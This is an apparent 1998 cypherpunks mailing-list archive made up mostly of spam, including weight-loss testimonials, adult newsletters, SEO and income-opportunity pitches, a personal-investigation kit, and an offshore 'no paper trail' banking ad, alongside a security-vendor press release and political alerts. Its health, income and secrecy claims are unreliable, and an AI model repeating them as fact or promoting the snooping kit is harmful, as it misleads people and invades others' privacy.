incredible results and immediate energy within the first two weeks!
* MONEY BACK GUARANTEE!  You have 30 days to try the products. 
If you are less than completely satisfied, send the "empty" bottles back 
for a full 100% refund.

You Have 30 DAYS To Try The Products At Wholesale Prices

Here is what just two people had to say (and there are many more):
Sharon H., female, age 44, Real-Estate agent, Atlanta, GA.  "I've lost 23 
pounds in four weeks and 2 dress sizes and my husband has lost 15.  
We were skeptical because we thought it was another one of those fad 
diets.  However, after researching and experiencing the products,  this 
is going to revolutinalize weight loss.  People have been asking me 
what I'm doing and when I tell them they don't believe it, so I just tell 
them to try it.  Why not? It comes with a 100% money back guarantee!"

Stanley K., male, age 41, Pittsburgh, PA.  "These products are amazing!  
Not only have I lost 15 pounds in first month, my energy level is high 
and consistent throughout the day. The system is easy; I've never 
been able to lose weight like this!  I'm actually eating more!  This has 
just blown me away.  And the most incredible thing is that I've haven't 
dieted a bit with the exception of avoiding excess starches."
For FREE, No Obligation Information About The Slender Now(tm) System, 

Call Toll FREE:  

1-888-668-0615

Due to the overwhelming response, you may get a busy signal.  If you do call
1-888-841-6242





















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED NEWS DAILY <stuffed@stuffed.net>
Date: Fri, 2 Oct 1998 13:49:36 -0700 (PDT)
To: (STUFFED FRIDAY OCTOBER 2 1998)
Subject: STUFFED IS NOW FASTER THAN EVER/WE HAVE 1,000S OF NEW MEGA-HOT FREE PICS!
Message-ID: <19981002071000.21852.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 MEGA HI-RES PICS
+ 5 SUPER-HORNY SEXY STORIES
+ SECURE SEX
+ HOW SEX BECAME DIRTY
+ LOVE AND MARRIAGE
+ BARK LIKE A DOG
+ DRUNK DRIVING WIERDOS
+ THE BEST OF EUREKA
+ WANNA BUY SOME TRASH

       ---->   http://stuffed.net/98/10/2/   <----

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL above.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the URL,  copy it and then paste it into your browser  (then
press Return).

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/98/10/2/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marita Nsman-Repo <Marita.Nasman-Repo@DataFellows.com>
Date: Fri, 2 Oct 1998 02:38:56 -0700 (PDT)
To: Crypto-Press-Global@DataFellows.com
Subject: MEDIA RELEASE: Data Fellows and TSP to Cooperate
Message-ID: <3.0.32.19981002102642.00916c60@smtp.datafellows.com>
MIME-Version: 1.0
Content-Type: text/plain



Press Release				For immediate release

Data Fellows Strengthens Its Position as Leading Data Security Vendor in
Europe

TSP and Its Worldwide Partner Network Joins Data Fellows

Helsinki, Finland, October 2, 1998 - Data Fellows, the developer of the
ground-breaking F-Secure Anti-Virus and Cryptography product family, and
the Dutch company TSP - The Security Provider have signed a cooperation and
distribution agreement. 

TSP, whose owners were behind ThunderByte anti-virus toolkit, currently has
over 40 distributors and 12 million ThunderByte users world-wide. TSP
specializes in security consultancy and marketing of information security
products. According to the announced cooperation agreement, TSP will
concentrate on selling Data Fellows products in the Netherlands, and its
international operations and distribution network will be taken over by
Data Fellows and its partners. 

"The addition of TSP to our list of partners will be yet another step
toward our goal of being among the top data security providers in the
world." says Risto Siilasmaa, President and CEO of Data Fellows. "Together
with Data Fellows' complete line of data security products, TSP's network
of distributors around the world is going to make a valuable contribution
to our existing world wide partner network that already covers over 80
countries."

Says Harald Zeeman of TSP, "The anti-virus market structures are changing.
The customers today demand overall data security solutions instead of point
applications. Therefore it is important for a small company like ours to
form alliances and thereby to remain viable. The future belongs to those
who have the broadest expertise and service to its customers.

"With this alliance we are able to serve our existing customer base by
offering them migration not only to the award-winning F-Secure Anti-Virus
product range but above all to the F-Secure Workstation Suite which Data
Fellows recently announced." 

TSP was founded in 1998 after Norman Data Defense Systems B.V. took over
the development of the ThunderByte scanning engine. 

About Data Fellows

Data Fellows is one of the world's leading developers of data security
products. The Company develops, markets and supports anti-virus, data
security and cryptography software products for corporate computer
networks. It has offices in San Jose, California, and Espoo, Finland, with
corporate partners, VARs and other distributors in over 80 countries around
the world. 

All F-Secure products are integrated into the CounterSign management
architecture, which provides a three-tier, scaleable, policy-based
management infrastructure to minimize the costs of security management. 

F-Secure Workstation Suite consists of malicious code detection and
removal, unobtrusive file and network encryption, and personal firewall
functionality, all integrated into a policy-based management architecture.

F-Secure Anti-Virus, with multiple scanning engines (including F-PROT and
AVP), is the most comprehensive, real-time virus scanning and protection
system for all Windows platforms. 

F-Secure VPN+ provides a software-based, IPSEC-compliant Virtual Private
Network solution for large corporate networks as well as remote and small
office networks. 

F-Secure FileCrypto is the first and only product to integrate strong
real-time encryption directly into the Windows file system. 

F-Secure SSH provides secure remote login, terminal, and other connections
over unsecured networks. It is the most widely used secure remote
administration tool.

F-Secure NameSurfer is the solution for remote Internet and Intranet DNS
administration.  Its easy-to-use WWW user interface automates and
simplifies DNS administration.

The Company has customers in more than 100 countries, including many of the
world's largest industrial corporations and best-known telecommunications
companies, major international airlines, European governments, post offices
and defense forces, and several of the world's largest banks. 

The Company was named one of the Top 100 Technology companies in the world
by Red Herring magazine in its September 1998 issue. Other commendations
include Hot Product of the Year 1997 (Data Communications Magazine); Best
Anti-Virus product (SVM Magazine, May 1997); Editor's Choice (SECURE
Computing Magazine); and the 1996 European Information Technology Prize.

For more information, please contact:

USA:

Data Fellows Inc. 
Mr. Petri Laakkonen, President
Tel. +1 408 938 6700, fax  +1 408 938 6701
E-mail:  Petri.Laakkonen@DataFellows.com

Europe:

Data Fellows Oy
Mr. Jari Holmborg, VP, Sales and Marketing  
PL 24   
FIN-02231 ESPOO				
Tel.  +358 9 859 900, fax. +358 9 8599 0599
E-mail: Jari.Holmborg@DataFellows.com
or visit our web site at http://www.DataFellows.com


--
Marita.Nasman-Repo@DataFellows.com, 
World-Wide Web http://www.DataFellows.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: BeF6785@mpifr-bonn.mpg.de
Date: Fri, 2 Oct 1998 10:57:46 -0700 (PDT)
To: ProfitSeekers@IncomeBoosters.com
Subject: Fired!
Message-ID: <199810021755.TAA11878@sun95.mpifr-bonn.mpg.de>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><PRE><BODY BGCOLOR="#ff0000"></P><P ALIGN=CENTER><FONT COLOR="#ffff00" SIZE=6><B>on fire!!!!

 amazing xxx video's
ALL LIVE
nothing to download

30 Days FREE. No Obligation.

</B>Look  Now!








to be removed from the list
click here









































xoxox     Marie</PRE></HTML>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: info@oaktree.org
Date: Fri, 2 Oct 1998 14:14:58 -0700 (PDT)
To: info@oaktree.org
Subject: Information on New Cellular Battery
Message-ID: <36154A870000007A@oaktree.oaktree.org>
MIME-Version: 1.0
Content-Type: text/plain


Information on New Cellular Battery

Hi:

If you or a loved one has ever missed making or receiving a call on your Motorola Cellular Flip
Phone because your battery lost power, you definitely want the All Day Battery from HITEC
Group at http://www.alldaybattery.com. (If you don't have a Motorola Flip Phone or if you have
a digital cellular phone this info is not for you.)

The All Day Battery provides:

1.  Extended Life: Minimum 5 hours of talk time and 36 hours of standby time on the oldest
phones.  Newer phones (more efficient) will get substantially more talk & standby time. 

2.  Patented Technology: The All Day Battery uses patented technology to protect it during the
charging cycle and to insure you that you get the maximum charge the battery will hold.

3.  Power Gauge: This battery has a true gauge display of the power left in the battery.  Standard
battery life indicators on cell phones only tells you that there is a voltage level in the battery - you
may get a level 5 reading and the battery could lose total power in the next instant.

4.  Battery Protection - The worst thing you can do to a battery is charge it.  During the charging
process other batteries are damaged or destroyed by heat and overcharging.  The All Day Battery
is protected from damage and the accurate power gauge tells you when it is fully charged.  All
other batteries try to protect against damage by never fully charging.

5.  Two(2) Year Warranty: A "No Hassle" two-year warranty is part of every All Day Battery.

Cell phones are critical for personal safety and are heavily used for important business activities. 
The All Day Battery is only $99.00 and provides security and functionality value that goes way
beyond that cost.  You can order direct on the Internet via a Verisign Secure site at
http://www.alldaybattery.com.

#############################################################################
This transmission is in compliance with "Section 301, Paragraph (a)(2)(C) of S. 1618, further
transmissions to you by the sender of this E-mail may be stopped at no cost to you by sending a
reply to this E-mail address with the word "remove" in the subject line."
#############################################################################





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gun Owners of America <goamail@gunowners.org> (by way of "Edwin E. Smith" <edsmith@IntNet.net>)
Date: Fri, 2 Oct 1998 18:28:23 -0700 (PDT)
To: edsmith@IntNet.net
Subject: Federal Power Grab Threatens Your Rights
Message-ID: <3.0.2.32.19981002203047.0080d100@mailhost.IntNet.net>
MIME-Version: 1.0
Content-Type: text/plain


Massive New Power Grab By The Feds
   -- gun owners' constitutional rights in jeopardy

Gun Owners of America E-Mail/FAX Alert
8001 Forbes Place, Suite 102, Springfield, VA 22151
Phone: 703-321-8585 / FAX: 703-321-8408
http://www.gunowners.org

First, an update on Smith's "Anti-Brady" amendment: The pro-gun
Smith amendment that passed the Senate in July is still awaiting
action in a House-Senate conference committee. In fact, the House
still has yet to pick the House conferees. GOA will keep you
updated on this important legislation which would put the brakes
on FBI's ability to register and tax gun owners. Keep calling
your legislators (202-224-3121) and urge them to oppose the
Commerce-Justice-State bill UNLESS it keeps the Smith language
100 percent intact.

(Friday, October 2, 1998)-- Rep. Bob Barr has discovered that
Janet Reno's Department of Justice (DOJ) is shopping around a
legislative "wish list" to further erode our constitutional
liberties. They are hoping to take advantage of the chaotic
situation in Washington to "load up" an appropriations bill
with a number of frightening expansions of federal power:

  * Enlarged asset forfeiture provisions to allow the FBI to
    seize personal property in both criminal and civil matters
    (your entire gun collection would be at risk)

  * A vastly expanded definition of terrorism to include
    domestic crimes having no relationship to terrorism
    (fighting "terrorism" is a new tactic of the gun grabbers,
    especially since the Supreme Court has stated that the
    Commerce Clause is no longer sufficient)

  * The ability to commandeer personnel from other federal
    agencies without reimbursement (just in case they need
    more agents for the next Waco)

  * Authority to force telephone and Internet companies to
    divulge information on their customers without a warrant
    (someone posts a message threatening the President to a gun
    list, and the feds demand the names and addresses of
    everyone who received the offending message)

  * Expanded wiretap authority to allow "roving" wiretaps of
    innocent citizens and gun owners, and wiretaps without any
    court authority whatsoever (so much for the Fourth
    Amendment)

  * Loosening of Posse Comitatus restrictions to allow more
    military involvement in domestic law enforcement
    (further blurring the line between police and military,
    which means destroying targets rather than making arrests)

  * The establishment of a permanent "FBI Police Force" (one
    could only speculate as to how bad this would be)

  * The power to seize commercial transportation assets for
    federal use (like the rest of the wish list, there is
    zero constitutional authority for this).

In an era in which agencies of the federal government routinely
target law-abiding gun owners for persecution, such assaults on
our constitutional rights must be stopped.

HERE'S WHAT TO DO:

Contact your Representative and both Senators. Urge them to
oppose any DOJ expansion of power through the appropriations
process. Call 202-224-3121 or hit the GOA website at
http://www.gunowners.org for phone, fax and e-mail of individual
Congressional offices.

Tell them to keep Smith in, and to keep the FBI out!


****************************************************************
Did someone else forward this to you? To be certain of getting
up to date information, please consider subscribing directly to
the GOA E-Mail Alert Network. The service is totally free and
carries no obligation. Your e-mail address remains confidential,
and the volume is quite low, usually one or two messages per
week. To subscribe, simply send a message (or forward this
notice) to goamail@gunowners.org and indicate your state of
residence in either the subject or the body. To unsubscribe,
reply to any alert and ask to be removed.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED NEWS DAILY <stuffed@stuffed.net>
Date: Sat, 3 Oct 1998 14:20:23 -0700 (PDT)
To: (STUFFED SATURDAY OCTOBER 3 1998)
Subject: STUFFED IS NOW FASTER THAN EVER/WE HAVE 1,000S OF NEW MEGA-HOT FREE PICS!
Message-ID: <19981003071001.20884.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 MEGA HI-RES PICS
+ 5 SUPER-HORNY SEXY STORIES
+ I SAW SATAN IN MY BURGER
+ AMERICANS VERY SLOW IN BED
+ MMMMM THAT WAS GOOD
+ THE CULT OF TWINKIE
+ THE BEST OF EUREKA

       ---->   http://stuffed.net/98/10/3/   <----

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL above.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the URL,  copy it and then paste it into your browser  (then
press Return).

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/98/10/3/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Adam Yared" <adam@yaredesigns.com>
Date: Fri, 2 Oct 1998 22:31:31 -0700 (PDT)
To: <info@ozeafood.com>
Subject: Ozeafood.com - Update and Special Offer
Message-ID: <003001bdee7e$f69b3a20$d1f125cb@workstation>
MIME-Version: 1.0
Content-Type: text/plain


Attention: Seafood Traders
_______________________________________________

We would like to introduce the premier Seafood Information
Resource for Australian Seafood Importers and Exporters and
Seafood Traders from around the world.

Over 6 months of extensive R&D has resulted in a simple,
usefull online trading system designed specifically for the
industry.

Ozeafood.com is a searchable database of Australian Seafood
Importers and Exporters and their products. The member has
full control over their own listing of products via a
management section.

Advanced features of the service allow members to update
their pricing and stock information, and trade seafood
online.

Take advantage of our special 60 day trial offer. Go to
www.ozeafood.com and enter your companies details.

For information via autoresponder send Email to
options@ozeafood.com

If you would like to discuss an Internet Marketing Strategy,
please call us on 1800 506 516 ( Australian Residents Only )

Ozeafood.com - Australian Seafood Information Resource
_____________________________________________

Website - www.ozeafood.com
Email - info@ozeafood.com
Phone Int + 617 5445 8884
Fax Int + 617 5445 8193















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill301@success600.com
Date: Sun, 4 Oct 1998 04:39:25 -0700 (PDT)
To: <bill301@success600.com>
Subject: Fire the Boss and Break the Alarm Clock!
Message-ID: <009d630512303a8VERY@bill301.com>
MIME-Version: 1.0
Content-Type: text/plain


Sent from: Success by Design
4974 N Cedar #116, Fresno, Ca, 93705
209 444-0550, bill301@success600.com
This text is placed here as stipulated in bill S. 1618 Title 3.
http://www.senate.gov/~murkowski/commercialemail/EMailAmendText.html
This is a FREE offer if you wish to be removed from future mailings, put remove in subject and please e-mail to... (remove@success600.com) this software will automatically block you from their future mailings.

Fire the Boss and break the Alarm Clock! 
I did! after eleven years, I left a $140,000 a year income for this opportunity. I can truly say it was one of the best decisions of my life!!! Never commute again! make $2000-$5000 per week from home! You can start out in your spare time, work part time or work up to full time if you want to! It's your business! Call 1-888-658-5840. no selling! not mlm! stay home with the family! Proven track record of success! 

For more info Email to 
your@success600.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: user6@new-century-commerce.com
Date: Sat, 3 Oct 1998 19:39:46 -0700 (PDT)
To: user6@new-century-commerce.com
Subject: Re:Your inquiry
Message-ID: <199810040239.TAA26315@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Hi,

        If you want to promote your product or service legitimately to 100,000's of people per week.
Bring your product or service to an audiance that is generally more affluent and technologically aware than any other. Our method will bring your product to the personal attention of 100,000's of potential customers very effectively and inexpensively.
         Please note we only accept responsible ethical advertisers. For more information email
user6@new-century-commerce.com.

         We also design State Of The Art Websites, our sites are designed in dual html and flash multimedia animation.
         Even if you have an existing Website which needs spicing up or you need to gather customer information we can provide the skills and  CGI programming to implement your requirements. 
         If you are interested please contact us and we will  be happy to show you our online portfolio of Websites. Our Websites are truely unbelievable!!!!
        
         






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <results@magnumhosting.com>
Date: Thu, 8 Oct 1998 12:24:24 -0700 (PDT)
Subject: Search Engine Placement--Your Key to Web Traffic
Message-ID: <18118141@mci2000.net>
MIME-Version: 1.0
Content-Type: text/plain


**Guaranteed Top 20 Placement**

Achieving a top spot on the major search
engines is still the most cost-effective way to
increase web-site traffic--and Profits.

It's free and you can reach millions.
However, you are also competing with millions.

You *MUST* be ranked within the Top 20 or
your customers will find your competitor instead.

That is why we offer this important service:

>>We GUARANTEE to get you placed within
>>the Top 20--and Keep You There!

If you would like FREE, no hype INFO on the
ways that you can dramatically improve your
ranking, write to us for more info.

Help your customers find you...not your
Competition!

______________________________________________
""""""""""""""""""""""""

For FREE INFO, simply send an email to us at:
responses@digital.intersponse.com
and put the word "free" in the subject line!

Email us and Start *uncovering* YOUR treasure!
>>> Do it today!  Do it NOW!
______________________________________________
""""""""""""""""""""""""



=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
This message complies with the proposed United States
Federal requirements for commercial e-mail bill, Section 301.

For additional info see:
http://www.senate.gov/~murkowski/commercialemail/EMailAmendText.html

Required Sender Information:
AMFX Promotions
12407 N. MoPac #100-413
Austin, TX 78758
(512)834-2021

Per Section 301, Paragraph (a)(2)(C) of S. 1618, further
transmissions to you by the sender of this e-mail may be
stopped at NO COST to you by sending an email to
responses@digital.intersponse.com
with the word "remove" in the subject line.
=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED NEWS DAILY <stuffed@stuffed.net>
Date: Sun, 4 Oct 1998 09:21:26 -0700 (PDT)
To: (STUFFED SUNDAY OCTOBER 4 1998)
Subject:       ---->   http://stuffed.net/98/10/4/   <----
Message-ID: <19981004071001.20715.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to  today's  issue of Stuffed. To read it you should
click on the URL above.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the URL,  copy it and then paste it into your browser  (then
press Return).

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/98/10/4/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tlmjc@msn.com
Date: Sun, 4 Oct 1998 14:22:50 -0700 (PDT)
To: website@traffic
Subject: Increase your website traffic dramitcally!
Message-ID: <0d5f537212104a8UPIMSSMTPSYS08@msn.com>
MIME-Version: 1.0
Content-Type: text/plain



  Increase Your Website Traffic Within 72 Hours!

    We'll put YOUR website at the top of the search engines!
 

If your site isn't getting the traffic it should, chances are it's because it's not ranked well on the major Internet search engines. According to recent studies on Internet commerce, over 90% of consumers find the websites they visit by using "The Big Eight" search engines. If your website isn't located in the top 20 pages of those engines, chances are your site will never be seen. What's the point of having an "invisible" website?

The SINGLE most important thing you can do increase your website traffic is to increase your search engine rank.

That's what we'll do for you.


HUGE RESULTS... LITTLE EFFORT...

You can spend hours marketing your site using every technique around, but 
they will all pale in comparison to getting your site properly ranked.  By 
getting to the top of the search engines, you can have HUGE amounts of 
visitors at your site in as little as 72 HOURS!



HOW THE SEARCH ENGINES RANK YOUR SITE...

When you submit your website to a search engine to be indexed in its 
database, it sends a "robot" out to scan your page. Then, using complex 
algorithms to rank your page for keyword relevance, the "robot" determines 
whether you'll be ranked # 1 or 1,000,000 when potential visitors conduct a 
search looking for sites like yours.

Because the search engines are constantly changing their algorithms to help 
provide users the best possible search results, there's only one true 
solution to high search engine placement. 

Us.



WIN THE SEARCH ENGINE WARS!

We understand these algorithms and will use them very ethically and legitimately to get your website on top. Now you can experience the on-line success you originally built your website for.

If you're not happy with your website's performance, let The Search Engine 
Success Group put YOU on top.



               IT WILL BE THE BEST THING YOU EVER DO TO IMPROVE
 YOUR ON-LINE SUCCESS.




HERE'S WHAT WE DO...

In order to counter the ever changing search engine algorithms, we create 
an entire series of "entry pages" that is optimized for the search engines - one for EVERY keyword you give us! Each entry page is optimized to do well for a different set of algorithm variables. So instead of having ONE page struggling to rank well, we simply create separate entry pages for each keyword! It's through this unique approach that we're able to help YOU conquer the search engines.

Now understand, we don't use "tricks" to fool the engines.  That's unethical and something we won't do.  After all - it's your reputation we have to protect.  What we will do is simply present very relevant keywords for your site to the search engines in the way that they like to see it.  Consequently, your pages rank well because they DO contain information HIGHLY relevant to the search query.  We NEVER build pages for irrelevant yet "popular" keywords.

The "entry pages" act as a welcome screen for your website.  They will say a
few introductory things about your site and then ask the visitor to "Click 
Here To Enter," taking them directly to your current homepage.

In creating these entry pages we DO NOT make any changes to the existing
structure, content, or functionality of your current site. All pages we
construct will link directly into your existing site. As a result, you
can rest assured that your current website will remain exactly the same.




HOW WELL DOES THE SERVICE WORK?

We'll send you a detailed report of your current search engine ranking on 
The Big Eight engines before we begin. Then, once your new entry pages have 
been indexed, we'll send you a second report showing how they've done. 
You'll be able to confirm the results yourself.


Here's a sampling of some results we've gotten for previous clients.  These
examples are for COMPETITIVE keywords - not obscure words that nobody's 
looking for...


<> 6 top 10 rankings on Infoseek for DIFFERENT relevant keywords

<> 18 top 10 rankings across the major search engines

<> 3 top 10 rankings on Alta Vista for ONE keyword

<> 16 total #1 rankings (and an astounding 40 top 30 rankings across 
   the different engines!!)

<> 1-2 hits per week exploded to 500 per day

<> 45,000 hits per month grew to 108,000... (and it's still growing!)



CLIENT COMMENTS:

"INCREDIBLE!! Our site is now receiving more hits in a day than we used to 
get in an entire month. [My boss] is still eating his words!"
-Bob W.

"I knew the search engines were an incredible marketing tool, but my company
simply didn't have the time to devote to search engine placement. It has 
proven to be the best money we've ever spent on marketing. We'll be sending 
you some referrals for sure! 
Thanks."
-Shelley H.

"I worked for weeks to get good search engine placement, but I could never 
crack the top 80...my site was deserted. Within a month [after using your 
service], I'd had more hits than I'd had in the last year. I wouldn't believe
it if it hadn't happened to me. Please don't mention a word to the 
competition."
-Chris L.




WHAT'S THE COST?

Our services are just $385. This includes:

<> Construction of optimized entry pages for up to 20 keywords
   - This gives you good "coverage"

<> Submission to the major search engines

<> A complete report of your search engine rankings before we begin

<> A complete report of your search engine rankings AFTER we've finished


       ****BE SURE TO ASK US HOW TO GET LISTED ON YAHOO!****




WHAT DO I NEED TO DO TO GET STARTED?

<> Call Us - we'll answer any questions.
<> Give us your keywords / keyword phrases (up to 20)
<> Pay us $385
<> Sit back and enjoy the show!


Your confidentiality is assured; we NEVER release any information about our clients.



--Search Engine Success Group--
      410-783-8269                 


***  Remember - our job is to increase your website's rank.  That's what we do.  We can't guarantee, however, that this will increase the number of visitors you get.  Some highly-ranked websites still don't get much traffic.  Much depends on your particular industry and choice of keywords.


-----------------------
If you're not interested in any potential future offers, 
just click reply. Thank you.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abayley@pop.ihug.co.nz
Date: Sun, 4 Oct 1998 15:44:24 -0700 (PDT)
To: You@aol.com
Subject: Find  Out  Anything  About  Anyone  On  The  Net  !!!!
Message-ID: <199810042243.RAA22281@app.fwi.com>
MIME-Version: 1.0
Content-Type: text/plain



YOU can easily learn how to investigate and learn EVERYTHING 
about your employees, neighbors, friends, enemies, and or
anyone else  !!!


It is absolutely amazing !!!
YOU Must Get This Extraordinary Package today.........


   +  YOU can track down an old friend or a lost love,
     and, just for fun, investigate your family history.

   +  YOU can screen prospective employees criminal records,
     look at their driving, or credit history.

   +  YOU can verify test results from drug testing and even
     look into your children's friends history for any type 
     of record.

   +  YOU can TRACK down and locate an old debtor who is
     hiding from you and see if he/she is hiding any assets.

   +  YOU can look up "unlisted telephone numbers."  Locate
     social security, birth, adoption or death records.
     Check Army, Navy, Marine Corps, or Air Force service
     file records.  YOU will simply be amazed to learn what
     sensitive and important information other people and
     enemies can discover about YOU !!!!!

YOU Can Find Out Anything About Anyone On The Net !!!
Do background checks on people and charge for it, as
you start your own investigative services.
Stop guessing about the LAW !!!
Look up laws and do much more, direct from famous law libraries.
Get this easy to use  KIT  right away, and then,
YOU can become a private investigator.

ORDER TODAY !!!!!


Send $18.00 cash (wrapped in two pieces of paper),
money order, or check to:

                    INFORMATION, Ltd.
                    P. O. Box  515019
                    St. Louis,  MO  63151-5019  USA

The Complete Package Will Be Immediately Shipped
Prepaid Directly to You With Everything You Will Need
In Your Kit to Get Started Right Away !!

THANK YOU for your kind attention, and have a nice day !!!!


+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++




YOUR AD IN 333 NEWSPAPERS !!!!!!!!!!
***********************************************

         Seven years ago, I learned how to place my Classified Ad in
several hundred newspapers, with just one telephone call.  And, my
cost was $0.51 per newspaper.  The total circulation was well over
1.5 Million.  I could reach just about any market, anywhere in this
country.  Since then, my small mail-order company has exploded.
And, I use this same time tested and true method week after week.

         I would like to share this powerful information and show you
how to save hundreds, even thousands of dollars on advertising that
works.  The average cost of a classified ad in a newspaper is about
$15.00 to $20.00 dollars.  Multiply that by 333 and your total cost is
well over $6,000.00 Dollars.  By using our amazing method, your
total cost is only $170.00.  Not to mention the time and money you
save by placing one call, instead of 333 long distance calls.

          You can limit your promotion to a Single State or place your
ad in Several States around the country, all with just one phone call.
You can reach One Million Readers on the East-Cost today and a
Million on the West-Coast tomorrow.  It's that simple  !!!!

            Your cost for this priceless information, is only $19.00 !!!  
You will make that back on your first promotion.  WE are so confident that
this type of advertising will boost your profits, we will guarantee your
satisfaction with our Money Back Guarantee !!  So, you have nothing
to lose.  Now, order our amazing classified ad method today !!!!!! 


                                PRINT ORDER FORM
Ship To:                    **************************
*********
NAME____________________________________________

ADDRESS________________________________________

CITY______________________________________________

STATE__________________    ZIP_____________________

E-MAIL__________________________________

Don't Delay,   ORDER YOUR COMPLETE MEDIA KIT TODAY !!!!!!!

**********************************************************************
Mail Payment  $19.00  CASH,  money order,  or check  TO:
********************
 
                                  INFORMATION, Ltd.
                                  P. O. Box  515019 
                                  St. Louis, MO 63151-5019  
                                  U.S.A.

WE will ship your complete KIT directly to you !!!!
 

**************************************************************
OPTIONAL / OVERNIGHT SHIPPING - ADD $15.00
**************************************************************
                          
Thank you for your kind attention, and have a nice day !!!


       YOU MAY ORDER BOTH PACKAGE KITS FOR ONLY $33.00



++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Admin
Internet Services
This message is not intended for residents in the 
State of Washington, screening of addresses has been done
to the best of our technical ability.
If you are a Washington resident or otherwise wish to be
removed from this list, go to global remove site if you want
your address removed from future mailing. 
http://209.84.246.162/remove.htm
 
This Global Communication has been sent to you by:
PAVILION ADVERTISING SERVICES
Offices:  London, Paris, Berlin, Hong Kong






















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Scott Balson" <gwb@gwb.com.au>
Date: Mon, 5 Oct 1998 02:03:02 -0700 (PDT)
To: <Undisclosed.Recipients>
Subject: One Nation thank you
Message-ID: <003401bdef6d$c1e31380$675212cb@QU.fox.uq.net.ai>
MIME-Version: 1.0
Content-Type: text/plain





Dear One Nation supporter in 
NSW 
Pauline Hanson would like to personally thank you for the 
outstanding support that you gave to the party before and during the 
election.
 
Coverage of the events in Blair - including the One Nation 
party on election evening can be seen on-line at:
 
<A 
href="http://www.gwb.com.au/gwb/news/onenation/federal/live">http://www.gwb.com.au/gwb/news/onenation/federal/live
 
---------
 
PARTIES CONSPIRE TO KEEP IMMIGRATION OUT OF ELECTION, BOOK SHOWSThe 
author of a new book called "This Tired Brown Land" has accused the 
majorpolitical parties of conspiring to keep immigration and population off 
theelection agenda. The book has already attracted good 
reviews.Author Mark O'Connor today claimed that both the major political 
partieswere suppressing discussion in order to deny One Nation 'the oxygen 
ofpublicity'. But it is exactly such bipartisan ignoring of public 
sentimenton immigration which caused One Nation, and led to the enormous 
success ofPaul Sheehan's book Among the Barbarianns.Immigration 
Minister Philip Ruddock recently launched the Coalition'spolicy in Perth-too 
late in the day for the Eastern media to pick up thestory. Says author Mark 
O'Connor, 'Clearly the Coalition knows its policyis not what the electorate 
wants.'Polls show that the electorate has made up its mind. Only 2% or 
3% ofvoters want immigration increased; and they are outnumbered, some 30 
toone, by the 65% or 70% who want it reduced. Neither ethnic Australians 
norAborigines support higher immigration. Most Australians 
supportmulticulturalism, yet want an immediate moratorium on 
immigration.'My book shows that in 1994-95 (under Labor) our net 
migration gain (ABSfigures) was 80,100 persons. Last year it was 83,700. 
Despite this, theCoalition has tried to give the impression of reducing 
immigration. Somecritics have even accused the government of 
"racism" for "reducingimmigration". This is 
false.'The book is available throough bookshops at $16.95, orby 
cheque or money order from Duffy & Snellgrove for $19.95 (includes p&p) 
atPO Box 177Potts Point NSW 1335fx 2 9386 1530<A 
href="mailto:dands@magna.com.au">dands@magna.com.au
 
------------------
 
GWB
 
 
 
Scott Balson
Pauline Hanson's One Nation web 
master


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: greens322@hotmail.com
Date: Sun, 4 Oct 1998 19:46:06 -0700 (PDT)
To: Friend@public.com
Subject: Read Carefully!!!
Message-ID: <199810050244.WAA09649@rome.ntr.net>
MIME-Version: 1.0
Content-Type: text/plain


                                                                    

                                                                         Briorex Inc

                                                      *****Off Shore Report 5599 FREE*****

*NO PAPER TRAIL, GLOBAL VISA CARDS REGARDLESS OF CREDIT
*PRESTIGIOUS OFFSHORE CHECKING ACCOUNTS
*INTERNATIONAL BUSINESS CORPORATIONS(IBCs)
*OFFSHORE ASSET PROTECTION TRUSTS
*SECRET OFFSHORE MAIL DROPS
*OFFSHORE PHONE ANSWERING SERVICES
*OFFSHORE SELF-LIQUIDATING LOANS
*OFFSHORE HIGH YIELD TAX FREE INVESTMENTS
*OFFSHORE TAX HAVENS - NO ONE KNOWS
*FREE OFFSHORE WORK SHOPS
*FREE OFFSHORE TRUSTS
